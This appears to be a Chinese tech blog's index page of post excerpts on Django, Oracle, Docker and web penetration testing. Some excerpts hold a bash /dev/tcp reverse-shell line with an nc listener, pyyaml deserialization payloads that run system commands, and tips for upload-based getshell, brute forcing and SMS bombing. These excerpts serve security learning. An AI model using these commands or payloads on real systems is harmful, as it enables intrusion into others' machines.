- 博客(189)
- 资源 (15)
- 收藏
- 关注
RSS订阅原创 Django导入已经设计好的表结构到models
踩坑记录一下:再开发之前表已经设计完成,django提供的方法可以直接根据已有的表创建models.py首先把已经设计好的表导入你项目的数据库然后执行python3 manage.py inspectdb (表名)> app名/models.py自动导入还会存在一些问题如 id = models.AutoField 默认如此情况,若主键不是id的时候则报错。但是这时候你又需要一些id自增的字段可以这样设置。id = models.IntegerField('id', blank=T
2021-07-26 10:17:32
1128
原创 phpinfo测试的利用点总结
扫描目录的时候会经常扫描到phpinfo页面,以下是一些可以关注的信息1.网站的绝对路径再getshell需要用到网站绝对路径,phpinfo页面就会有网站的绝对路径。比如phpmyadmin利用mysql修改日志方法getshell需要用到绝对路径2.禁用的函数。phpinfo页面会显示出禁用的函数方法,再写shell时可以提前先查看3.可能会泄露数据库账号密码这个要看运气了,有时候把数据库信息设置到环境变量中就会显示有一次扫描目标刚好有phpmyadmin, 利用泄露的账号密码和主机
2021-06-23 15:59:22
4023
原创 Django自定义过滤器
Django自带的过滤器功能有限,有时候满足自己的需求只能定制化例如现在要做一个排除的过滤器,选中这个关键词后会排除跟这个有关的内容。 class AuthorFilter(admin.SimpleListFilter): title = '排除提交者' # 过滤标题显示为"排除提交者" parameter_name = 'exclude' # 过滤器使用的过滤字段 def lookups(self, request, model_.
2021-06-03 16:17:28
585
原创 burpsuite前端JS加密的爆破
使用工具: jsEncrypter burpsuite phantomjs再测试SRC时,弱口令总是比别人搞得慢,特别是遇到前端加密的情况,所以抽时间来完善一下我的武器库。一、jsEncrypter安装今天用到的工具jsEncrypter官方地址https://github.com/c0ny1/jsEncrypter没安装mvn的直接下载 release版本就行了,不用再去编译他。release版本https://github.com/...
2021-03-23 20:07:14
2838
1
原创 微信小程序反编译
准备工具:1.mumu模拟器2.adb 工具3.反编译工具一、获取小程序wxapkg文件。安装mumu模拟器后安装微信。微信打开要反编译的小程序连接。点击打开后,微信会自动下载这个小程序。adb命令连接mumu模拟器mac命令adb kill-server && adb server && adb shellwindows命令adb connect 127.0.0.1:7555adb shell连接后其实就是..
2021-03-20 15:26:22
1154
1
原创 Django带搜索功能的下拉框
原本只做了一个下拉框,后面随着数据越来越多,选择数据就变得很困难。考虑再下拉框中再增加一个搜索功能。方法一:django-select2-forms可以参考官方文档设置:https://pypi.org/project/django-select2-forms/2.0.2/不过对py3和django3的支持不好,会产生报错,所以我放弃了这个方法。方法二:使用jquery2 select2可以参考:https://blog.youkuaiyun.com/qq_42469759/article.
2021-03-16 16:04:16
4278
1
原创 OPatch requires a response file for Oracle Configuration Manager (OCM)解决
今天安装一个Oracle11.2.0.4的测试靶机,打补丁的时候报错Verifying environment and performing prerequisite checks...UtilSession 失败:To run in silent mode, OPatch requires a response file for Oracle Configuration Manager (OCM).Please run "C:\Users\xx\AppData\Local\Temp\oracl
2020-12-16 18:29:25
631
原创 常用的搜索引擎语法
搜索关键字的返回的结果比较的时候这时候使用高级语法和通配符效果会比较容易找到我们想要的页面常用高级语法:intitle 包含标题intext 包含内容filetype 文件类型info 基本信息site 指定网站inurl 包含某个urllink 包含指定链接的网页cache 显示页面的缓存版本numberange ...
2020-05-07 09:55:48
2291
原创 php sprintf函数引起的sql注入
sprintf函数作用:sprintf() 函数把格式化的字符串写入变量中。arg1、arg2、++ 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。注释:如果 % 符号多于 arg 参数,则您必须使用占位符。占位符位于 % 符号之后,由数字和 "\$" 组成测试1.php文件...
2020-03-11 18:31:15
3073
原创 tomcat设置manager不限制密码错误次数
人家为了安全性都要限制密码最大错误尝试次数。我却要不限制,好吧,刚刚在测试Tomcat弱口令爆破的时候,扫描一会就被锁住了。查询一下资料Tomcat 默认最大尝试错误次数为5次。超过5次会出现即使账号密码正确也登录不上的情况。查询资料可以增加两个属性failureCount允许错误次数和lockOutTime锁定时间编辑server.xml增加两个属性failureCount=...
2020-01-03 15:06:03
2384
3
原创 Django配置MEDIA_ROOT遇到的错误问题
今天加了一个markdown编辑器后,图片一直显示不出来原本想把MEDIA_URL 和 STATIC_URL设置为一样 发现会报错。于是修改为别的目录。上传上去以后,图片不显示,按照网上的答案增加from django.conf.urls import url, includefrom django.conf.urls.static import staticfrom ...
2019-11-14 20:15:25
2477
2
原创 oracle官网数据库使用迅雷下载方法
今天要去官网下载一个oracle的数据库,直接使用浏览器下载会一直卡主。直接右键复制链接到迅雷去下载老是下载几KB的不知道什么文件后面网上搜索知道下载的文件时登录后自动生成的。所以想到的解决办法是。登录后点击下载,在复制这个下载url到迅雷中果然下载的url和之前看到的不一样丢到迅雷中下载,这次可以成功下载了...
2019-10-15 10:59:31
1601
1
原创 Jinja2 Expected an expression, got 'end of print statement'
使用python-doc-Docx-Template报错这个问题一般是语法错误。但是我模板文件有好几十页。使用一个快速的办法定位模板中错误的地方。一段一段的删除运行,进行排除法。最后发现忘了输入变量名导致的还有一个报错genreport.py 17 Encountered unknown tag 'endfor'. You probably...
2019-10-14 10:21:48
4775
原创 web测试中的短信问题
记录一下:网站中手机号已经成为最重要也是最普遍的验证方式了。所以关注短信的问题。1.重置密码/短信验证码登录时验证码回显。直接通过抓包,若验证码直接出现在返回包则直接可以跳过手机验证的阶段。2.验证码没有限制发送频率。利用这个来做短信炸弹,3.发送手机短信验证时不需要输入图片验证码直接发送。直接可以调用接口,可以被人利用做短信轰炸。4.可以控制短信内容。抓包...
2019-08-17 23:57:49
432
原创 APP安全测试一般关注点
记录一下:一、身份认证安全1、暴力破解账号密码没有设置错误最大尝试次数,没有验证码校验,2、前端校验账号密码修改返回包的返回值测试。3、密码重置安全利用短信验证码回传,验证码暴力破解等二、业务接口调用1.重放攻击短信炸断,自定义短信内容,邮件查单三、业务交易安全窜依篡改金额,负数支付,绕过支付,支付溢出,多线程并发,多重替换支付四、业务授权安全水平越权和垂直越权...
2019-08-11 22:16:03
544
原创 python bs4标签中含有标签string为空
用bs4解析的时候发现一个问题,标签中含有标签,string属性打印出来的内容为空。如:想要打印出p中的文本内容使用p.string打印结果为None.查询资料:获取tag内容有如下三种方法soup.a.stringsoup.a.textsoup.a.get_text()string方法不能处理标签中含有标签的内容,获取为Nonetext和get_text可以获...
2019-06-30 16:07:14
4498
原创 oracle数据库安装和打补丁的一些坑
今天安装了一下oracle数据库,发现确实很麻烦而且经常出现错误。就稍微简单记录一下错误centos7 oracle12.2.0.1自动安装脚本https://github.com/keepwalking86/oracle12copatch没升级导致不能执行,opatch 版本下载及psu下载https://blog.youkuaiyun.com/huoshuyinhua/article...
2019-06-17 13:42:18
4540
原创 virtualbox虚拟机和宿主机互相访问
要实现宿主机能上网,能和虚拟机相互通信。首先用桥接肯定是能实现的,但是一般网管会限制网络,一个人只能用一个静态ip地址。使用NAT虚拟机能上网,可以ping通宿主机,但是宿主机ping不通虚拟机。解决办法,通过端口转发的方式实现宿主机连接虚拟机。测试 virtualbox中安装kali这样就可以ssh连接上去了kali中开启sshvi /etc/ssh/sshd...
2019-05-22 14:02:51
4262
原创 mysql数据库密码破解方法
1.先找到到user.MYD文件。所有的mysql系统用户的账号密码都存在这个文件里。2.编辑器打开这一串hash就是localhost@root的密码,注意破解的时候前面的*不要。3.找个破解的网站破解https://www.cmd5.com/这样忘记了密码都可以通过这样的方式找回,不过如果是比较复杂的密码,是破解不成功的。...
2019-05-08 09:38:50
21700
3
原创 pocsuite3 写poc
知道创宇的pocsuite3更新了。https://github.com/knownsec/pocsuite3一、安装安装p'ython3.4以上pip3 install pocsuite3安装完成后 控制台输入pocsuite,如下结果就是安装成功了二、poc测试写一个很简单的poc测试flask的ssti漏洞from pocsuite3.api im...
2019-04-09 14:29:09
5673
1
原创 python 代码注入、命令执行函数和方法
一.内置危险函数execexecfileeval二.标准库危险模块ossubprocesscommands三.危险第三方库Template(user_input) : 模板注入(SSTI)所产生的代码执行subprocess32四.反序列化marshalPyYAMLpickle和cpickleshelvePILunzip...
2019-04-08 13:42:56
4183
原创 后台getshell常用技巧
1.利用文件上传漏洞,找文件上传处想办法上传php文件。一些网站在设置可以允许修改上传的文件类型则直接添加php有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况这种情况直接上传一个.hatccess文件覆盖这个,让其失效。或者上传不重命名的...
2019-04-03 18:02:15
12532
1
原创 阿里云学生机服务器开启端口
记录一下:今天在我的阿里云学生机上搭建了个mysql,已经设置好远程端口,并且防火墙已经开启3306端口了,但是怎么都连不上。最后查了一下,需要再学生机的控制台里再开启端口才有 效果。阿里云功能太多了,我找了好久都没找到我的主机在哪里,后面再别人的解答里发现,学生机属于轻服务器,打开地址:https://swas.console.aliyun.com/?spm=5176.1182...
2019-03-28 21:56:43
1370
原创 cnnvd爬取漏洞信息
这段时间cnnvd的xml文件一直不更新,没办法只能自己去爬取。github上一搜索发现有挺多的类似的项目。scrapy框架编写的脚本https://github.com/luweiwei1111/python_spider/tree/master/scrapy/cnnvd说明:1.本程序用于爬取cnnvd网址的数据,并将数据通过sqlite3数据库保存在cnnvd.db库文件里面,...
2019-03-14 19:07:35
4580
原创 esxi低版本导出的ova导入workstations报错
记录一下。esxi5.1版本导出的ova导入workstations14时报错。首先报错:规范一致性错误这个直接重试就可以了。然后报错Invalid target disk adapter type:pvscsi这个低版本导入高版本会出错,直接把ova文件解压然后修改ovf文件中的修改为这时ovf的sha1值变化了,网上下载个hash工具重新计算o...
2019-02-28 17:44:43
2127
原创 几种Linux下反弹shell的方法总结
在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行 nc -lvp port表示显示执行过程监听端口在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1这样就可以在我们的主机上执行命令了 二、n...
2019-02-14 17:42:20
945
原创 pyyaml反序列化漏洞
pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。测试import yamlyaml.load('!!python/object/apply:os.system ["date"]') 结果poc还可以!!python/object/apply:subprocess.check_output [[calc.exe]]!!python/object...
2019-02-14 14:05:38
904
原创 解决python Markdown模块乱码
有个需求需要把markdown转成html模块,查询了一下刚好有这个模块安装 pip install amrkdown安装完成直接转换并保存为html时,发现出现中文乱码的情况用编辑器打开发现是缺少utf8编码所以只需要在头增加一行<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&...
2019-01-22 18:32:00
2876
1
原创 docker ubuntu REST API
最近需要使用docker api。简单记录一下一、安装配置测试机器:ubuntu16.04配置文件路径查询systemctl show --property=FragmentPath docker 配置文件sudo vim /lib/systemd/system/docker.service ExecStart=/usr/bin/dockerd -H unix:///v...
2019-01-15 17:09:50
726
原创 docker Starting MySQL database server mysqld fail解决办法
今天有一个ubuntu+mysql的测试环境,在容器重启的时候mysql启动失败,导致docker启动失败。首先查看docker日志docker logs 8a16发现有如下报错: * Stopping MySQL database server mysqld ...done. * Starting MySQL database server mysqld .....
2018-12-18 18:28:27
5971
1
原创 2018弱密码TOP 100
MARK:留着爆破测试 弱口令使用123456password12345678912345678123451111111234567sunshineqwertyiloveyouprincessadminwelcome666666abc123football123123monkey654321!@#$%^&*charlieaa123456do...
2018-12-17 13:24:15
7158
原创 解决redhat vmware安装后鼠标不能使用问题
今天VMware搭建一个redhat发现鼠标不能使用,需要设置成PS2模式才能使用。网上好多说法都不是很靠谱,最终找到一个靠谱解决的办法了,记录一下。解决办法:1、将启动模式设置为文本模式看到操作系统列表后,按e进入编辑模式,移动光标到以kernel开头的那一行,再次键入e,这时会出现一个grub edit>的命令提示符,在这一行最后面键入 空格和single ,如:kern...
2018-12-11 09:52:46
4805
2
原创 命令注入
命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。测试脚本command.py:import os,subprocessimport syscommand = "ping -c 4 {}".format(sys.argv[1])p = subprocess.Popen(command, shell=True, stdout=subprocess...
2018-12-04 10:34:57
4556
1
原创 insert、update和delete 注入方法
我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete的注入方法。以下均为报错注入,测试数据库版本5.7.21利用内置函数updatex...
2018-11-28 20:23:53
5062
原创 web页面点击劫持
今天看到一个google的点击劫持漏洞获得7500美刀,连接如下https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/ 点击劫持漏洞,利用UI重叠,视觉上的欺骗的漏洞,用于钓鱼。了解点击劫持可以参考freebuff这篇文章《浅析点击劫持攻击》https://www.freebuf.com/ar...
2018-11-14 19:55:07
1785
原创 windows设置开机启动脚本修改配置文件和重启服务
有一台动态ip的测试机器,上面部署Nginx,然后每次重启机器后ip总会变动,需要改nginx.conf配置文件和重启nginx服务。所以要解决这个问题,想到的解决方法:1、python脚本来解决修改配置和重启服务2、把python脚本制作成exe文件3、exe脚本添加为开机启动一、python脚本# -*- coding:UTF-8 -*-import reimpo...
2018-11-07 15:04:57
1955
原创 Nginx通过二级目录反向代理不同端口的站点
今天在同一台测试机器上搭建了IIS的站点,Tomcat的站点,weblogic站点。现在有个需求这三个站点都要使用80端口进行访问,因为是在局域网里所以没有办法设置不同的域名作为server_name。后面想到可以用二级目录作为区分。所以修改nginx.conf文件添加: upstream iis { server 192.168.188.149:81; }...
2018-11-02 10:57:09
8484
原创 IIS搭建php站点时访问会提示要登录
今天要整合一个漏洞环境把php和asp两种编程语言的站点整合到一起,在这个过程中遇到了一个问题。就是访问php文件的时候一直会提示需要输入用户名密码。问题描述:您未被授权查看该页 您不具备查看该目录或页面的权限,因为访问控制列表 (ACL) 对 Web 服务器上的该资源进行了配置。 ------------------------------...
2018-11-01 14:06:19
654
原创 weblogic环境搭建的遇到的问题记录
1.安装时JAVA_HOME路径无效修改文件/home/weblogic/Oracle/Middleware/wlserver_10.3/common/bin/commEnv.sh文件修改JAVA_HOME路径为 JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.9/jre" 2.启动时startWebLogic.sh时又报JAVA_H...
2018-10-08 21:39:49
1015
原创 CNVD原创漏洞证书总结
之前打算申请个CNVD的原创漏洞证书。经过这一个多月的时间证书下来了,现在简单总结一下。原创漏洞审核和处理流程参考此链接:http://www.cnvd.org.cn/webinfo/show/3933然后我就说说我提交过两个后台的文件上传漏洞7.26提交-7.27二审通过,验证通过-9.4三审通过,漏洞归档-9.9漏洞公开我在想漏洞公开了,怎么证书也应该下来了,我这个通用型的漏洞...
2018-09-12 10:51:41
44388
10
phpcms v9.6.0版本
2017-09-09
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
2017-09-08
WAVSEP1.5版本war包
2017-09-04
IIS上asp和php环境配置文件
2016-11-18
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人